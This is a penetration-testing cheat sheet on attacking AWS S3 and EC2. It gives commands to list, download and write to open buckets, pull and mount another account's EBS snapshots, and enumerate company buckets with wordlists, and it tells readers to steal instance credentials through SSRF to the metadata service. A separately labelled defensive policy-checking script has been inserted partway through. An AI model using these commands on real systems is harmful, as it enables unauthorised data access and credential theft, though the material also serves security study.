Amazon Bucket S3 AWS

Prerequisites: at a minimum you need awscli

sudo apt install awscli

You can get your credentials here /security_credential
but you need an AWS account (free tier account):

aws configure

aws configure --profile nameofprofile

Then you can use *--profile nameofprofile* in the aws command

By default the names of Amazon buckets look like [bucket_name]/
You can browse open buckets if you know their names [bucket_name]/

  Basic test - Listing the files

aws s3 ls s3://targetbucket --no-sign-request --region insert-region-here

aws s3 ls  s3:// --no-sign-request --region us-west-2

You can get the region with dig and nslookup

$ dig

$ nslookup
Non-authoritative answer: name =

  Move a file into the bucket

aws s3 mv test.txt s3://
FAIL : "move failed: ./test.txt to s3:// A client error (AccessDenied) occurred when calling the PutObject operation: Access Denied."

aws s3 mv test.txt s3://hackerone.files
SUCCESS : "move: ./test.txt to s3://hackerone.files/test.txt"

  Download everything (in an open bucket)

aws s3 sync s3:// . --no-sign-request --region us-west-2
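
Seen from the bucket owner's side, the unsigned ls, mv and sync tests above succeed when the bucket policy (or ACL) grants s3:ListBucket, s3:PutObject or s3:GetObject to an anonymous principal. The check below is an added example, not part of the original page: it reads a bucket policy document (for instance the Policy string returned by aws s3api get-bucket-policy) and reports which of the three are open. The function names and the sample policy are constructed for illustration.

```python
import json
from fnmatch import fnmatchcase

# S3 actions behind the unsigned commands on this page:
#   aws s3 ls -> s3:ListBucket, aws s3 sync (download) -> s3:GetObject,
#   aws s3 mv (upload) -> s3:PutObject
ACTIONS = {"list": "s3:ListBucket", "read": "s3:GetObject", "write": "s3:PutObject"}

def as_list(value):
    return value if isinstance(value, list) else [value]

def is_anonymous(principal):
    # "*" and {"AWS": "*"} both match any caller, including unsigned requests.
    if isinstance(principal, dict):
        return "*" in as_list(principal.get("AWS", []))
    return principal == "*"

def anonymous_access(policy_json):
    """Report anonymous list/read/write exposure for one bucket policy.
    Resource scoping is ignored; statements with a Condition are not
    evaluated and are listed under "review" instead."""
    allowed, denied, review = set(), set(), set()
    for stmt in as_list(json.loads(policy_json).get("Statement", [])):
        if not is_anonymous(stmt.get("Principal")):
            continue
        patterns = [p.lower() for p in as_list(stmt.get("Action", []))]
        hits = {name for name, action in ACTIONS.items()
                if any(fnmatchcase(action.lower(), p) for p in patterns)}
        if "Condition" in stmt:
            review |= hits
        elif stmt.get("Effect") == "Deny":
            denied |= hits
        elif stmt.get("Effect") == "Allow":
            allowed |= hits
    public = allowed - denied  # an explicit Deny always overrides an Allow
    return {"public": sorted(public), "review": sorted(review - public)}

# Constructed sample policy (bucket name is a placeholder, not from the page).
SAMPLE_POLICY = json.dumps({"Version": "2012-10-17", "Statement": [
    {"Effect": "Allow", "Principal": "*", "Action": ["s3:Get*", "s3:ListBucket"],
     "Resource": ["arn:aws:s3:::example-bucket", "arn:aws:s3:::example-bucket/*"]},
    {"Effect": "Allow", "Principal": {"AWS": "*"}, "Action": "s3:PutObject",
     "Resource": "arn:aws:s3:::example-bucket/*",
     "Condition": {"IpAddress": {"aws:SourceIp": "203.0.113.0/24"}}},
]})

if __name__ == "__main__":
    print(anonymous_access(SAMPLE_POLICY))
```

Bucket ACLs and Block Public Access settings also affect anonymous access and are not covered by this check.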

  Check bucket disk size (authenticated); use --no-sign-request for unauthenticated

aws s3 ls s3://<bucketname> --recursive  | grep -v -E "(Bucket: |Prefix: |LastWriteTime|^$|--)" | awk 'BEGIN {total=0}{total+=$3}END{print total/1024/1024" MB"}'

  AWS - Extract Backup

aws --profile flaws sts get-caller-identity
"Account": "XXXX26262029",

aws --profile flaws  ec2 describe-snapshots --owner-id XXXX26262029 --region us-west-2    
"SnapshotId": "snap-XXXX342abd1bdcb89",

Create a volume using the snapshot
aws --profile swk ec2 create-volume --availability-zone us-west-2a --region us-west-2  --snapshot-id  snap-XXXX342abd1bdcb89

In the AWS Console -> EC2 -> New Ubuntu
chmod 400 YOUR_KEY.pem
ssh -i YOUR_KEY.pem

Mount the volume
sudo file -s /dev/xvda1
sudo mount /dev/xvda1 /mnt

  Bucket information
Amazon exposes an internal service that every EC2 instance can query for instance metadata about the host.
If you find an SSRF vulnerability in an application that runs on EC2,
try requesting : will return the AccessKeyID, SecretAccessKey, and Token

For example with a proxy :

  Bucket Finder
A cool tool that will search for readable buckets and list all the files in them. It can also be used to quickly find buckets that exist but deny access to listing files.

wget -O bucket_finder_1.1.tar.bz2
./bucket_finder.rb my_words
./bucket_finder.rb --region ie my_words

US Standard =
Ireland =
Northern California =
Singapore =
Tokyo =

./bucket_finder.rb --download --region ie my_words
./bucket_finder.rb --log-file bucket.out my_words

Use a custom wordlist for the bucket finder, can be created with

List of Fortune1000 company names with permutations on .com, -backup, -media. For example, walmart becomes walmart,, walmart-backup, walmart-media.
List of the top Alexa 100,000 sites with permutations on the TLD and www. For example, becomes,,, and walmart.

